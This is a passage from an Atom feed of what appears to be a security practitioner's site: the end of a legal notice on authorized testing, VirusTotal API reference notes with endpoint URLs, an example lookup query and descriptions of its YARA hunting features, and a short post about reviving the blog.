&lt;p&gt;&lt;strong&gt;Legal Notice:&lt;&#x2F;strong&gt; This engagement outline is for authorized security professionals operating under formal contractual and legal agreements with explicit CFAA authorization. All tools, techniques, and scenarios must be used only within the scope of written authorization against systems owneby or explicitly consented to by the target organization. Engagement personnel must coordinate with qualified legal counsel to ensure compliance with the CFAA, applicable state laws, and SEC materiality obligations prior to commencing any active testing.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Virus Total</title>
        <published>2026-04-16T00:00:00+00:00</published>
        <updated>2026-04-16T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://zerokoan.com/archive/ti/virustotal/"/>
        <id>https://zerokoan.com/archive/ti/virustotal/</id>
        
        <content type="html" xml:base="https://zerokoan.com/archive/ti/virustotal/">&lt;h2 id=&quot;virustotal&quot;&gt;VirusTotal&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.virustotal.com&#x2F;docs&#x2F;api-overview&quot;&gt;API documentation&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Official API v3 client libraries:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;VirusTotal&#x2F;vt-go&quot;&gt;Go&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;VirusTotal&#x2F;vt-py&quot;&gt;Python&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Unofficial API v2 client libraries:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;dutchcoders&#x2F;go-virustotal&quot;&gt;Go&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;public-api&quot;&gt;Public API&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;base url:&lt;&#x2F;strong&gt; &lt;code&gt;http:&#x2F;&#x2F;www.virustotal.com&#x2F;vtapi&#x2F;v2&#x2F;&lt;&#x2F;code&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;base url:&lt;&#x2F;strong&gt; &lt;code&gt;http:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;&lt;&#x2F;code&gt;&lt;&#x2F;p&gt;
&lt;p&gt;500 requests&#x2F;day at 4 requests&#x2F;minute&lt;&#x2F;p&gt;
&lt;p&gt;Must not be used for commercial products and services, or business workflows which do not contribute new files&lt;&#x2F;p&gt;
&lt;h4 id=&quot;ips&quot;&gt;IPs&lt;&#x2F;h4&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;ip_addresses&#x2F;{ip}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;ip_addresses&#x2F;{ip}&#x2F;comments&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;ip_addresses&#x2F;{ip}&#x2F;{relationship}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Example:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;curl --request GET \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     --url https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;ip_addresses&#x2F;23.1.52.26 \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     --header &amp;#39;accept: application&#x2F;json&amp;#39; \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     --header &amp;#39;x-apikey: [api_key]&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;domains&quot;&gt;Domains&lt;&#x2F;h4&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;domains&#x2F;{domain}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;domains&#x2F;{domain}&#x2F;comments&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;domains&#x2F;{domain}&#x2F;{relationship}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;domains&#x2F;{domain}&#x2F;relationships&#x2F;{relationship}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;https:&#x2F;&#x2F;www.virustotal.com&#x2F;api&#x2F;v3&#x2F;resolutions&#x2F;{id}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;premium-api&quot;&gt;Premium API&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;vt-hunting&quot;&gt;VT Hunting&lt;&#x2F;h4&gt;
&lt;ul&gt;
&lt;li&gt;Uses YARA to search VT&#x27;s dataset using three components:
&lt;ol&gt;
&lt;li&gt;Livehunt&lt;&#x2F;li&gt;
&lt;li&gt;Retrohunt&lt;&#x2F;li&gt;
&lt;li&gt;VTDIFF&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h5 id=&quot;livehunt&quot;&gt;Livehunt&lt;&#x2F;h5&gt;
&lt;p&gt;Compares files submitted to VT with YARA rules in real time&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Stream of malware files classified by family&lt;&#x2F;li&gt;
&lt;li&gt;Discover new malware&lt;&#x2F;li&gt;
&lt;li&gt;Filter by given language, specific run-time packer&lt;&#x2F;li&gt;
&lt;li&gt;Heuristic rules to detect suspicious files&lt;&#x2F;li&gt;
&lt;li&gt;Track threat actors&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h5 id=&quot;retrohunt&quot;&gt;Retrohunt&lt;&#x2F;h5&gt;
&lt;p&gt;Compare historical files with YARA rules, which can take up to 4 hours&lt;&#x2F;p&gt;
&lt;h5 id=&quot;vtdiff&quot;&gt;VTDIFF&lt;&#x2F;h5&gt;
&lt;p&gt;Provide a collection of hashes to track and avoid, to create YARA rules with common binary subsequences&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>The Resurrection</title>
        <published>2026-04-05T00:00:00+00:00</published>
        <updated>2026-04-05T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://zerokoan.com/blog/260405-the-resurrection/"/>
        <id>https://zerokoan.com/blog/260405-the-resurrection/</id>
        
        <content type="html" xml:base="https://zerokoan.com/blog/260405-the-resurrection/">&lt;p&gt;With an organizational restructure, I am untethered once again. So I&#x27;m bringing this back. Though it&#x27;s been long enough, that everything has been razed and is reborn anew. Very much a work in progress right now; but aren&#x27;t we all?&lt;&#x2F;p&gt;
&lt;p&gt;Yes, we are.&lt;&#x2F;p&gt;
</content>
        
    </entry>
</feed>
